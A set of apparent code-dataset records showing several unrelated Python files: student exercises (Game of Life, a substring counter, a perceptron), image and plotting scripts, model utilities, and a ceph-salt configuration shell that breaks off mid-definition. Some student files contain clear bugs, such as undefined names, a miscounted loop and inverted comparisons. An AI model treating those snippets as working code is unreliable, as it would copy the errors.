Tuple[int, int]\nCells = List[int]\nGrid = List[Cells]\n\nclass GameOfLife:\n\n def __init__(self, size, randomize=True, max_generations=None):\n # Размер клеточного поля\n self.rows, self.cols = size\n # Предыдущее поколение клеток\n self.prev_generation = self.create_grid()\n # Текущее поколение клеток\n self.curr_generation = self.create_grid(randomize=randomize)\n # Максимальное число поколений\n self.max_generations = max_generations\n # Текущее число поколений\n self.generations = 1\n\n def create_grid(self, randomize: bool=False) -> Grid:\n grid = [[0]*self.cols for i in range(self.rows)]\n if randomize:\n for i in range(self.rows):\n for j in range(self.cols):\n grid[i][j] = random.randint(0,1)\n return grid\n\n def get_neighbours(self, cell: Cell) -> Cells:\n i, j = cell\n right_wrap = (j + 1)%self.cols\n bot_wrap = (i + 1)%self.rows\n return [(i-1, j-1), (i-1, j), (i-1, right_wrap),\n (i, j-1), (i, right_wrap),\n (bot_wrap, j-1), (bot_wrap, j), (bot_wrap, right_wrap)]\n\n def get_next_generation(self) -> Grid:\n grid = self.curr_generation\n cells_to_update = []\n for i in range(self.rows):\n for j in range(self.cols):\n neighbours = self.get_neighbours((i,j))\n s = sum(self.grid[n[0]][n[1]] for n in neighbours)\n if grid[i][j] == 0 and s == 3:\n cells_to_update.append((i, j, 1))\n elif grid[i][j] == 1 and (s < 2 or s > 3):\n cells_to_update.append((i, j, 0))\n for c in cells_to_update:\n grid[c[0]][c[1]] = c[2]\n return grid\n\n def step(self) -> None:\n for i in self.rows:\n for j in range.cols:\n self.prev_generation[i][j] = self.curr_generation[i][j]\n self.curr_generation = self.get_next_generation()\n self.generations += 1\n\n @property\n def is_max_generations_exceeded(self) -> bool:\n return self.generations <= self.max_generations\n\n @property\n def is_changing(self) -> bool:\n return self.curr_generation == self.prev_generation\n \n\n @staticmethod\n def from_file(filename: pathlib.Path) -> 'GameOfLife':\n with open(filename) as f:\n data = f.read()\n return [[int(c) for c in i] for i in data.split()]\n\n def save(filename: pathlib.Path) -> None:\n \"\"\"\n Сохранить текущее состояние клеток в указанный файл.\n \"\"\"\n with open(filename, 'w') as f:\n f.write(\"\\n\".join(\"\".join(row) for row in self.curr_generation))\n\n\n","sub_path":"homework3/life.py","file_name":"life.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"225376345","text":"def count_substring(long_str,target):\r\n\tindex = 0\r\n\tfor index in range(len(long_str)-len(target)+1):\r\n\t\tif long_str[index:index+len(target)] == target:\r\n\t\t\tindex+=1\r\n\tprint('{trage} is show in {long_str} with {index} times'.format(trage,long_str,index))\r\ncount_substring('love, love, love, all you need is love', 'love')\r\n\r\n'''\r\ndef count_substring_v1(string, target):\r\n count = 0\r\n index = 0\r\n while index < len(string) - len(target) + 1:\r\n if string[index : index + len(target)] == target:\r\n count += 1\r\n index += 1 # <- look here\r\n return count\r\n\r\ndef count_substring_v2(string, target):\r\n count = 0\r\n index = 0\r\n while index < len(string) - len(target) + 1:\r\n if string[index : index + len(target)] == target:\r\n count += 1\r\n index += len(target) # <- look here\r\n else:\r\n index += 1\r\n return count\r\n'''","sub_path":"10-13_while-count_substring.py","file_name":"10-13_while-count_substring.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"226230523","text":"import numpy as np\nimport cv2\n\ndef pencil(filename, debug, status):\n # learned parameters\n omega1 = 11.0\n omega2 = 37.0\n omega3 = 52.0\n sigmaB = 9.0\n uA = 105.0\n uB = 225.0\n muD = 90.0\n sigmaD = 11.0\n\n # pencil sketch tone distribution\n def p1(v):\n return (1/sigmaB)*np.exp(-(255-v)/sigmaB) if v <= 255 else 0\n\n def p2(v):\n return 1/(uB-uA) if uA <= v <= uB else 0\n\n def p3(v):\n return (1/(np.sqrt(2*np.pi*sigmaD**2)))*np.exp(-(v-muD)**2/(2*sigmaD**2))\n\n img = cv2.imread(filename)\n # img = cv2.imread('sign.jpg')\n img = cv2.cvtColor(img, cv2.cv.CV_BGR2GRAY)\n h, w = img.shape\n\n imgN = np.asarray(img, dtype=np.float32)\n cv2.normalize(imgN,imgN,0,1,cv2.NORM_MINMAX)\n\n dX = np.diff(imgN, axis=0)**2\n dY = np.diff(imgN, axis=1)**2\n dX = np.row_stack((dX, np.ones(w)))\n dY = np.column_stack((dY, np.ones(h)))\n # dX.resize(h, w)\n # dY.resize(h, w)\n G = (dX+dY)**1/2\n\n kSize = min(h,w)/30\n kernel = np.zeros([kSize, kSize])\n # kernel[kSize/2] = np.ones(kSize)\n kernel[:,kSize/2] = np.ones(kSize)\n\n kernels = []\n center = (kSize/2, kSize/2)\n angle = 0.0\n for i in range(8):\n M = cv2.getRotationMatrix2D(center, angle+i*22.5, 1)\n kernels.append(cv2.warpAffine(kernel, M, (kSize, kSize)))\n # kernels.append(cv2.warpAffine(kernel, M, (kSize, kSize), flags=cv2.INTER_NEAREST))\n\n gi = []\n for i in range(8):\n gi.append(cv2.filter2D(G,-1,kernels[i]))\n gi = np.asarray(gi, dtype=np.float32)\n\n ci = []\n for i in range(8):\n status.progress += 10\n current = G.copy()\n ci.append(current)\n it = np.nditer(ci[i], flags=['multi_index'], op_flags=['readwrite'])\n while not it.finished:\n j, k = it.multi_index\n if np.argmax(gi[:,j,k]) != i:\n current[j,k] = 0\n it.iternext()\n\n s = []\n for i in range(8):\n s.append(cv2.filter2D(ci[i],-1,kernels[i]))\n s = np.asarray(s, dtype=np.float32)\n status.progress += 10\n\n # result = sum(s)\n result = np.amax(s, axis=0)\n result[result>1] = 1\n\n cv2.normalize(result,result,0,1,cv2.NORM_MINMAX)\n\n # it = np.nditer(G, flags=['multi_index'], op_flags=['readwrite'])\n # while not it.finished:\n # if (np.argmax(G1[it.multi_index]) < 1 or np.argmax(G1[it.multi_index]) > 2):\n # it[0] = 0\n # it.iternext()\n\n cv2.normalize(result,result,0,255,cv2.NORM_MINMAX)\n result = 255 - result\n result = np.asarray(result, dtype=np.uint8)\n\n status.progress += 10\n\n\n p1 = np.vectorize(p1, otypes=[np.float32])\n p2 = np.vectorize(p2, otypes=[np.float32])\n p3 = np.vectorize(p3, otypes=[np.float32])\n\n img1 = p1(img)\n img2 = p2(img)\n img3 = p3(img)\n\n p = omega1*img1 + omega2*img2 + omega3*img3\n cv2.normalize(p,p,0,255,cv2.NORM_MINMAX)\n p = np.asarray(p, dtype=np.uint8)\n hist = cv2.equalizeHist(p)\n\n status.progress += 10\n\n if debug == 0:\n retval = result + hist\n elif debug == 1:\n retval = result\n else:\n retval = hist\n\n return cv2.cvtColor(retval, cv2.cv.CV_GRAY2RGB)\n # cv2.imwrite('result.jpg', result)\n # cv2.imshow('Pencil Drawing Rendering', hist)\n # cv2.waitKey(0)\n","sub_path":"pencil.py","file_name":"pencil.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"606153733","text":"def list_search(_list, _string):\n result = []\n for i in range(len(_list)):\n if _list[i].find(_string) is not -1:\n result.append(i)\n return result\n\n\nif __name__ == '__main__':\n key_values = {}\n key = input()\n value = input()\n n = int(input())\n for j in range(n):\n _input = input().split(' => ')\n curr_key = _input[0]\n curr_value = _input[1].split(';')\n key_values[curr_key] = curr_value\n\n for kvp in key_values.items():\n matches = list_search(kvp[1], value)\n if kvp[0].find(key) is not -1:\n print(f'{kvp[0]}:')\n if len(matches) > 0:\n print('-' + '\\n-'.join([str(kvp[1][i]) for i in matches]))\n","sub_path":"Dictioneries/extra_exercises/p01_key-key_value-value.py","file_name":"p01_key-key_value-value.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"571314972","text":" ##################################################################################################################################################\n#Name:Sam Evans\n#Date:3/28/20\n#Description:Chaos Game (Sierpinski Triangle)\n##################################################################################################################################################\nfrom Tkinter import *\nfrom random import randint\n#2D Point class\nclass Point(object):\n\tdef __init__ (self, x = 0.0, y = 0.0):\n\t\tself.x = x\n\t\tself.y = y\n #Decorators \n\t@property\n\tdef x(self):\n\t\treturn self._x\n\t@x.setter\n\tdef x(self, value):\n\t\tself._x = value\n\t@property\n\tdef y(self):\n\t\treturn self._y\n\t@y.setter\n\tdef y(self, value):\n\t\tself._y = value\n #Distance Formula\n\tdef dist(self, other):\n\t\tdelta_x = (self._x) - (other._x)\n\t\tdelta_y = (self._y) - (other._y)\n\t\treturn (delta_x ** 2 + delta_y ** 2) ** 0.5\n #Midpoint formula\n\tdef midpt(self, other):\n\t\tx_co = (self._x + other._x)/2\n\t\ty_co = (self._y + other._y)/2\n\t\treturn Point(x_co, y_co)\n #Magic string function\t\n\tdef __str__(self):\n\t\treturn (\"({}), ({})\").format(self.x, self.y)\n\n# the coordinate system class: (0,0) is in the top-left corner\n# inherits from the Canvas class of Tkinter\nclass ChaosGame(Canvas):\n POINT_COLOR = [\"red\", \"black\"]\n POINT_RADIUS = [0, 2]\n def __init__(self, master):\n Canvas.__init__(self, master, bg = \"white\")\n self.pack(fill = BOTH, expand = 1)\n def plotPoints(self, n):\n #initial vertices\n vertices = [Point(MIN_X, MAX_Y), Point(MAX_X, MAX_Y), Point(MID_X, MIN_Y)]\n points = []\n #plots the 3 vertices in vertices list\n for i in(vertices):\n \n self.plot2(i)\n #calculates the midpont of the 3 vertices\n midpt = vertices[0].midpt(vertices[1])\n points.append(midpt)\n self.plot(midpt)\n #calculates the midpoint of random vertices and plots\n for i in range (n):\n midpt2 = points[-1].midpt(vertices[randint(0,(len(vertices)-1))])\n points.append(midpt2)\n self.plot(midpt2)\n def plot(self, other):\n #color points black with a Radius of 0\n color = self.POINT_COLOR[1]\n self.create_oval(other.x, other.y, other.x + self.POINT_RADIUS[0] * 2, other.y + self.POINT_RADIUS[0] * 2, outline=color, fill=color)\n def plot2(self, other):\n #color points red with Radius of 2\n color = self.POINT_COLOR[0]\n self.create_oval(other.x, other.y, other.x + self.POINT_RADIUS[1] * 2, other.y + self.POINT_RADIUS[1] * 2, outline=color, fill=color)\n####################################B######################################################################################################\n#main\n#window size\nWIDTH = 600\nHEIGHT = 520\n#number of points\nNUM_POINTS = 50000\n# Min, Mid, and Max x & y values\nMIN_X = 5 \nMAX_X = 595\nMIN_Y = 5\nMAX_Y = 515\nMID_X = (MIN_X + MAX_X)/2\n#tk window \nwindow = Tk()\nwindow.geometry(\"{}x{}\".format(WIDTH,HEIGHT))\n\ns = ChaosGame(window)\ns.plotPoints(NUM_POINTS)\nwindow.mainloop()\n","sub_path":"Chaos game version 1.py","file_name":"Chaos game version 1.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"159159126","text":"\"\"\"\r\nAuthor: Katherine Gerot\r\n\r\nNeural Network practice on xor\r\n\"\"\"\r\nimport numpy, random, os\r\noutput_file = open(\"output_file.txt\", 'w')\r\nlr = 1\r\nbias = 1\r\nweights = [random.random(),random.random(),random.random()]\r\ndef Print_File(*inputs) :\r\n print(*inputs, sep=' ', file=output_file)\r\ndef Scale(p) :\r\n if(p > 0) :\r\n return 1\r\n else :\r\n return 0\r\ndef Weight(a,b) : \r\n return a*weights[0]+b*weights[1]+bias*weights[2]\r\ndef Perceptron(input_one, input_two, output) :\r\n perceptron_output = Weight(input_one,input_two) # weighted sum\r\n perceptron_output = Scale(perceptron_output) # sig scale\r\n err = output - perceptron_output\r\n weights[0] += err * input_one * lr\r\n weights[1] += err * input_two * lr\r\n weights[2] += err * bias * lr\r\n Print_File(perceptron_output, 'e:', err)\r\nPrint_File(\"====================TESTING======================\")\r\nfor i in range(50) :\r\n Perceptron(1,1,1) # True and true\r\n Perceptron(1,0,0) # True and false\r\n Perceptron(0,1,0) # False and true\r\n Perceptron(0,0,0) # True and false\r\nPrint_File(\"======================USER INPUT=====================\")\r\nx = int(input(\"x \"))\r\ny = int(input(\"y \"))\r\nresult = Scale(Weight(x,y))\r\nprint(x, \"AND\", y, \"is\", result)\r\n","sub_path":"neural.py","file_name":"neural.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"531906643","text":"import os\nimport datetime\nimport numpy as np\nfrom scipy import interpolate\n\nimport readers.ionex as ionex\nfrom constants import TEC_const, c\n\n\ndef get_closest_number(n, m):\n q = int(n / m)\n n1 = m * q\n if (n * m) > 0:\n n2 = m * (q + 1)\n else:\n n2 = m * (q - 1)\n\n return n1, n2\n\n\ndef interpolator(observed, map):\n lat, lon, tec = observed\n\n map_lats = np.array(get_closest_number(lat, 2.5))\n map_lons = np.array(get_closest_number(lon, 5))\n map_lats = np.repeat(map_lats, 2)\n map_lons = np.tile(map_lons, 2)\n map_tec = [map[map_lat][map_lon] for map_lat, map_lon in zip(map_lats, map_lons)]\n my_inter = interpolate.interp2d(map_lons, map_lats, map_tec)\n inter_tec = float(my_inter(lon, lat))\n s = inter_tec - tec\n st = s / TEC_const\n sc = st / c\n print(\n \"{:>20.4f}{:>20.4f}{:>20.4f}{:>20.4f}{:>20.2e}\".format(\n inter_tec, tec, s, st, sc\n )\n )\n\n\ncomparison = {\n \"BOGI\": 3.723,\n \"BOGO\": -4.123,\n \"BOR1\": 19.898,\n \"JOZ2\": 11.385,\n \"JOZE\": -10.638,\n \"LAMA\": 14.441,\n \"WROC\": 19.056,\n}\n\n\ndir = r\"C:\\users\\macie\\Desktop\\ion_map\\ion_map\\TEST_OUT\"\nion_file = r\"C:\\Users\\macie\\Desktop\\ion_map\\tests\\test_files\\igsg0760.15i\"\n\nionex_map = ionex.read(ion_file)\nhour = datetime.datetime(2015, 3, 17, 8)\nobs = {}\nfor file in os.listdir(dir):\n site = file[:4]\n if site in comparison:\n obs[site] = []\n file_path = dir + \"\\\\\" + file\n with open(file_path, \"r\") as file:\n lines = file.readlines()\n for line in lines[1:]:\n if line[:20] != r\" 2015/03/17 08:00:00\":\n break\n data = [float(x) for x in line.split()[3:]]\n obs[site].append(data)\n\n# for site in obs:\n# print(site, comparison[site])\n# for o in obs[site]:\n# interpolator(o, ionex_map[hour])\n#\nprint(ionex_map[hour][50])\n","sub_path":"ion_map/inter.py","file_name":"inter.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"560822139","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.cygwin-1.7.35-i686/egg/seedbox/db/sqlalchemy/model_util.py\n# Compiled at: 2015-06-14 13:30:57\n\"\"\"\nProvides utilities for managing models\n\"\"\"\nimport logging\nfrom seedbox.db import models as api_model\nfrom seedbox.db.sqlalchemy import models as db_model\nLOG = logging.getLogger(__name__)\n\ndef from_db(db_item):\n \"\"\"Database to Model\n\n Handles the conversion from the database model object to the\n corresponding public facing api model object. If an item has\n a reference to another model object then the call is recursive.\n\n :param db_item: an instance of a database model object\n :returns: an instance of an api model object\n \"\"\"\n if db_item is None:\n return db_item\n else:\n _model = getattr(api_model, db_item.__class__.__name__)\n instance = _model.make_empty()\n for k in instance:\n if k == instance.PK_NAME:\n instance[k] = db_item.get('id')\n else:\n _attr = db_item.get(k)\n if isinstance(_attr, db_model.Base):\n instance[k] = from_db(_attr)\n elif isinstance(_attr, list) and _attr and isinstance(_attr[0], db_model.Base):\n instance[k] = [ from_db(v) for v in _attr ]\n else:\n instance[k] = _attr\n\n return instance\n\n\ndef to_db(api_item, db_item=None):\n \"\"\"Model to database\n\n Handles the conversion from the api model object to the\n corresponding database model object. If an item has\n a reference to another model object then the call is recursive.\n\n :param api_item: an instance of a api model object\n :param db_item: an instance of a database model object that\n is to be updated. (optional)\n :returns: an instance of an database model object\n \"\"\"\n if api_item is None:\n return api_item\n else:\n row = db_item\n if row is None:\n _model = getattr(db_model, api_item.__class__.__name__)\n row = _model(id=getattr(api_item, api_item.PK_NAME))\n for k, v in api_item.items():\n if isinstance(v, api_model.Model):\n v = to_db(v)\n elif isinstance(v, list) and v and isinstance(v[0], api_model.Model):\n v = [ to_db(elm) for elm in v ]\n row[k] = v\n\n return row","sub_path":"pycfiles/SeedboxManager-2.3.17-py2.7/model_util.py","file_name":"model_util.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"166621306","text":"from __future__ import division\nimport numpy as np\nimport numpy.random as npr\nimport matplotlib.pyplot as plt\n\nfrom pybasicbayes.distributions import Regression\nfrom pybasicbayes.util.text import progprint_xrange\nfrom pypolyagamma.distributions import BernoulliRegression\nfrom pylds.models import LDS, DefaultPoissonLDS\n\nnpr.seed(0)\n\n# Parameters\nD_obs = 10\nD_latent = 2\nT = 2000\n\n# True LDS Parameters\nmu_init = np.array([0.,1.])\nsigma_init = 0.01*np.eye(2)\n\nA = 0.99*np.array([[np.cos(np.pi/24), -np.sin(np.pi/24)],\n [np.sin(np.pi/24), np.cos(np.pi/24)]])\nsigma_states = 0.01*np.eye(2)\n\nC = np.random.randn(D_obs, D_latent)\nb = -2.0 * np.ones((D_obs, 1))\n\n# Simulate from a Bernoulli LDS\ntruemodel = LDS(\n dynamics_distn=Regression(A=A, sigma=sigma_states),\n emission_distn=BernoulliRegression(D_out=D_obs, D_in=D_latent, A=C, b=b))\ndata, stateseq = truemodel.generate(T)\n\n# Fit with a Poisson LDS\nmodel = DefaultPoissonLDS(D_obs, D_latent)\nmodel.add_data(data, verbose=False)\n\nN_iters = 50\ndef em_update(model):\n model.EM_step()\n ll = model.log_likelihood()\n return ll\n\nlls = [em_update(model) for _ in progprint_xrange(N_iters)]\n\n# Plot the log likelihood over iterations\nplt.figure(figsize=(10,6))\nplt.plot(lls,'-b')\nplt.xlabel('iteration')\nplt.ylabel('log likelihood')\n\n# Plot the smoothed observations\nfig = plt.figure(figsize=(10,10))\nN_subplots = min(D_obs, 6)\nsmoothed_obs = model.states_list[0].smooth()\ntrue_smoothed_obs = truemodel.states_list[0].smooth()\n\nylims = (-0.1, 1.1)\nxlims = (0, min(T,1000))\n\nn_to_plot = np.arange(min(N_subplots, D_obs))\nfor i,j in enumerate(n_to_plot):\n ax = fig.add_subplot(N_subplots,1,i+1)\n # Plot spike counts\n given_ts = np.where(data[:,j]==1)[0]\n ax.plot(given_ts, np.ones_like(given_ts), 'ko', markersize=5)\n\n # Plot the inferred rate\n ax.plot([0], [0], 'ko', lw=2, label=\"observed data\")\n ax.plot(smoothed_obs[:,j], 'r', lw=2, label=\"poisson mean\")\n ax.plot(true_smoothed_obs[:,j], 'k', lw=2, label=\"true mean\")\n\n if i == 0:\n plt.legend(loc=\"upper center\", ncol=4, bbox_to_anchor=(0.5, 1.8))\n if i == N_subplots - 1:\n plt.xlabel('time index')\n ax.set_xlim(xlims)\n ax.set_ylim(0, 1.1)\n ax.set_ylabel(\"$x_%d(t)$\" % (j+1))\n\nplt.show()\n\n","sub_path":"examples/poisson_lds.py","file_name":"poisson_lds.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"566031948","text":"\"\"\"\nInvert a binary tree.\n\n 4\n / \\\n 2 7\n / \\ / \\\n1 3 6 9\nto\n 4\n / \\\n 7 2\n / \\ / \\\n9 6 3 1\n\"\"\"\nclass Solution(object):\n def invertTree(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: TreeNode\n \"\"\"\n if root is None:\n return root\n left = self.invertTree(root.left)\n right = self.invertTree(root.right)\n root.left, root.right = right, left\n return root\n#BFS\nfrom collections import deque\nclass Solution(object):\n def invertTree(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: TreeNode\n \"\"\"\n if not root:\n return root\n q = deque()\n q.append(root)\n while len(q) > 0:\n cur = q.popleft()\n left = cur.left\n cur.left = cur.right\n cur.right = left\n \n if cur.left:\n q.append(cur.left)\n if cur.right:\n q.append(cur.right)\n return root","sub_path":"interview/others/easy/LC226. Invert Binary Tree.py","file_name":"LC226. Invert Binary Tree.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"325187625","text":"# pylint: disable=arguments-differ\nimport logging\nimport fnmatch\nimport json\n\n\nfrom pyparsing import alphanums, OneOrMore, Optional, Regex, Suppress, Word\n\nimport configshell_fb as configshell\nfrom configshell_fb.shell import locatedExpr\n\nfrom .core import CephNodeManager, SshKeyManager, CephNode\nfrom .exceptions import CephSaltException, MinionDoesNotExistInConfiguration, PillarFileNotPureYaml\nfrom .salt_utils import GrainsManager, PillarManager, SaltClient, CephOrch\nfrom .terminal_utils import PrettyPrinter as PP\nfrom .validate.config import validate_config\nfrom .validate.salt_master import check_salt_master_status, CephSaltPillarNotConfigured\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass OptionHandler:\n def value(self):\n return None, None\n\n def save(self, value):\n pass\n\n def reset(self):\n pass\n\n def read_only(self):\n return False\n\n def possible_values(self):\n return []\n\n # pylint: disable=unused-argument\n def children_handler(self, child_name):\n return None\n\n def commands_map(self):\n return {}\n\n\nclass PillarHandler(OptionHandler):\n def __init__(self, pillar_path):\n self.pillar_path = pillar_path\n\n def value(self):\n return PillarManager.get(self.pillar_path), None\n\n def save(self, value):\n PillarManager.set(self.pillar_path, value)\n\n def reset(self):\n PillarManager.reset(self.pillar_path)\n\n def read_only(self):\n return False\n\n\nclass BootstrapMinionHandler(PillarHandler):\n def __init__(self):\n super().__init__('ceph-salt:bootstrap_minion')\n\n def save(self, value):\n if value not in self.possible_values():\n raise MinionDoesNotExistInConfiguration(value)\n node = CephNodeManager.ceph_salt_nodes()[value]\n PillarManager.set('ceph-salt:bootstrap_mon_ip', node.public_ip)\n super().save(value)\n\n def possible_values(self):\n return [n.minion_id for n in CephNodeManager.ceph_salt_nodes().values()]\n\n\nclass RolesGroupHandler(OptionHandler):\n def value(self):\n return '', None\n\n\nclass RoleElementHandler(OptionHandler):\n def __init__(self, ceph_salt_node, role):\n self.ceph_salt_node = ceph_salt_node\n self.role = role\n\n def value(self):\n roles = CephNodeManager.all_roles(self.ceph_salt_node)\n if not roles - {self.role}:\n return 'no other roles', None\n return \"other roles: {}\".format(\", \".join(roles - {self.role})), None\n\n\nclass RoleHandler(OptionHandler):\n def __init__(self, role):\n self.role = role\n self._value = set()\n\n def _load(self):\n self._value = {n.minion_id for n in CephNodeManager.ceph_salt_nodes().values()\n if self.role in n.roles}\n\n def possible_values(self):\n self._load()\n return [n.minion_id for n in CephNodeManager.ceph_salt_nodes().values()]\n\n def value(self):\n self._load()\n return self._value, True\n\n def save(self, value):\n self._load()\n _minions = set(value)\n to_remove = self._value - _minions\n to_add = _minions - self._value\n\n for minion in to_remove:\n CephNodeManager.ceph_salt_nodes()[minion].roles.remove(self.role)\n CephNodeManager.ceph_salt_nodes()[minion].save()\n\n for minion in to_add:\n CephNodeManager.ceph_salt_nodes()[minion].add_role(self.role)\n CephNodeManager.ceph_salt_nodes()[minion].save()\n\n CephNodeManager.save_in_pillar()\n\n self._value = set(value)\n\n def children_handler(self, child_name):\n return RoleElementHandler(CephNodeManager.ceph_salt_nodes()[child_name], self.role)\n\n\nclass CephSaltNodeHandler(OptionHandler):\n def __init__(self, ceph_salt_node):\n self.ceph_salt_node = ceph_salt_node\n\n def value(self):\n roles = CephNodeManager.all_roles(self.ceph_salt_node)\n if not roles:\n return 'no roles', None\n return \", \".join(roles), None\n\n\nclass CephSaltNodesHandler(OptionHandler):\n def __init__(self):\n self._minions = set()\n self._ceph_salt_nodes = set()\n\n def value(self):\n self._ceph_salt_nodes = {n.minion_id for n in CephNodeManager.ceph_salt_nodes().values()}\n return self._ceph_salt_nodes, True\n\n def save(self, value):\n _value = set(value)\n to_remove = self._ceph_salt_nodes - _value\n to_add = _value - self._ceph_salt_nodes\n\n for minion in to_remove:\n CephNodeManager.remove_node(minion)\n for minion in to_add:\n CephNodeManager.add_node(minion)\n\n self._ceph_salt_nodes = set(value)\n\n def possible_values(self):\n if not self._minions:\n self._minions = set(CephNodeManager.list_all_minions())\n return self._minions - self._ceph_salt_nodes\n\n def children_handler(self, child_name):\n return CephSaltNodeHandler(CephNodeManager.ceph_salt_nodes()[child_name])\n\n\nclass SSHGroupHandler(OptionHandler):\n def commands_map(self):\n return {\n 'generate': self.generate_key_pair\n }\n\n def generate_key_pair(self):\n private_key, public_key = SshKeyManager.generate_key_pair()\n PillarManager.set('ceph-salt:ssh:private_key', private_key)\n PillarManager.set('ceph-salt:ssh:public_key', public_key)\n PP.pl_green('Key pair generated.')\n\n def value(self):\n stored_priv_key = PillarManager.get('ceph-salt:ssh:private_key')\n stored_pub_key = PillarManager.get('ceph-salt:ssh:public_key')\n if not stored_priv_key and not stored_pub_key:\n return \"no key pair set\", False\n if not stored_priv_key or not stored_pub_key:\n return \"invalid key pair\", False\n try:\n SshKeyManager.check_keys(stored_priv_key, stored_pub_key)\n return \"Key Pair set\", True\n except Exception: # pylint: disable=broad-except\n return \"invalid key pair\", False\n\n\nclass SshPrivateKeyHandler(PillarHandler):\n def __init__(self):\n super(SshPrivateKeyHandler, self).__init__('ceph-salt:ssh:private_key')\n\n def value(self):\n stored_priv_key, _ = super(SshPrivateKeyHandler, self).value()\n stored_pub_key = PillarManager.get('ceph-salt:ssh:public_key')\n try:\n SshKeyManager.check_private_key(stored_priv_key, stored_pub_key)\n return SshKeyManager.key_fingerprint(stored_pub_key), None\n except Exception as ex: # pylint: disable=broad-except\n return str(ex), False\n\n\nclass SshPublicKeyHandler(PillarHandler):\n def __init__(self):\n super(SshPublicKeyHandler, self).__init__('ceph-salt:ssh:public_key')\n\n def value(self):\n stored_pub_key, _ = super(SshPublicKeyHandler, self).value()\n stored_priv_key = PillarManager.get('ceph-salt:ssh:private_key')\n try:\n SshKeyManager.check_public_key(stored_priv_key, stored_pub_key)\n return SshKeyManager.key_fingerprint(stored_pub_key), None\n except Exception as ex: # pylint: disable=broad-except\n return str(ex), False\n\n\nclass FlagGroupPillarHandler(OptionHandler):\n def __init__(self, pillar_path, default):\n self.pillar_path = pillar_path\n self.default = default\n\n def commands_map(self):\n return {\n 'enable': self.enable,\n 'disable': self.disable,\n 'reset': self.reset\n }\n\n def enable(self):\n PillarManager.set(self.pillar_path, True)\n PP.pl_green('Enabled.')\n\n def disable(self):\n PillarManager.set(self.pillar_path, False)\n PP.pl_green('Disabled.')\n\n def reset(self):\n PillarManager.reset(self.pillar_path)\n PP.pl_green('Value reset.')\n\n def value(self):\n val = PillarManager.get(self.pillar_path)\n if val is None:\n val = self.default\n return (\"enabled\", True) if val else (\"disabled\", True)\n\n\nclass TimeServerGroupHandler(OptionHandler):\n def commands_map(self):\n return {\n 'enable': self.enable,\n 'disable': self.disable\n }\n\n def enable(self):\n PillarManager.set('ceph-salt:time_server:enabled', True)\n PP.pl_green('Enabled.')\n\n def disable(self):\n PillarManager.set('ceph-salt:time_server:enabled', False)\n PP.pl_green('Disabled.')\n\n def value(self):\n val = PillarManager.get('ceph-salt:time_server:enabled')\n if val is None:\n return \"enabled\", True\n if val: # enabled\n host = PillarManager.get('ceph-salt:time_server:server_host')\n if host is None:\n return \"enabled, no server host set\", False\n\n return (\"enabled\", True) if val else (\"disabled\", True)\n\n\nclass TimeServerHandler(PillarHandler):\n def possible_values(self):\n return [n.minion_id for n in CephNodeManager.ceph_salt_nodes().values()]\n\n\nCEPH_SALT_OPTIONS = {\n 'Ceph_Cluster': {\n 'help': '''\n Cluster Options Configuration\n ====================================\n Options to specify the structure of the Ceph cluster, like\n membership, roles, etc...\n ''',\n 'options': {\n 'Minions': {\n 'help': 'The list of salt minions that are used to deploy Ceph',\n 'default': [],\n 'type': 'minions',\n 'handler': CephSaltNodesHandler()\n },\n 'Roles': {\n 'type': 'group',\n 'handler': RolesGroupHandler(),\n 'help': '''\n Roles Configuration\n ====================================\n ''',\n 'options': {\n 'Admin': {\n 'type': 'minions',\n 'default': [],\n 'handler': RoleHandler('admin'),\n 'help': 'List of minions with Admin role'\n },\n 'Bootstrap': {\n 'help': 'Cluster\\'s first Mon and Mgr',\n 'handler': BootstrapMinionHandler(),\n 'required': True,\n 'default_text': 'no minion',\n 'default': None\n },\n }\n },\n }\n },\n 'Containers': {\n 'help': '''\n Container Options Configuration\n ====================================\n Options to control the configuration of the Ceph containers used\n for deployment.\n ''',\n 'options': {\n 'Images': {\n 'type': 'group',\n 'help': \"Container images paths\",\n 'options': {\n 'ceph': {\n 'help': 'Full path of Ceph container image',\n 'default_text': 'no image path',\n 'required': True,\n 'handler': PillarHandler('ceph-salt:container:images:ceph')\n },\n }\n },\n }\n },\n 'System_Update': {\n 'help': '''\n System Update Options Configuration\n =========================================\n Options to control system updates\n ''',\n 'options': {\n 'Packages': {\n 'type': 'flag',\n 'help': 'Update all packages',\n 'handler': PillarHandler('ceph-salt:updates:enabled'),\n 'default': True\n },\n 'Reboot': {\n 'type': 'flag',\n 'help': 'Reboot if needed',\n 'handler': PillarHandler('ceph-salt:updates:reboot'),\n 'default': True\n }\n }\n },\n 'Cephadm_Bootstrap': {\n 'help': '''\n Cluster Bootstrap Options Configuration\n =========================================\n Options to control the Ceph cluster bootstrap\n ''',\n 'handler': FlagGroupPillarHandler('ceph-salt:bootstrap_enabled', True),\n 'options': {\n 'Ceph_Conf': {\n 'type': 'conf',\n 'help': 'Bootstrap Ceph configuration',\n 'default': 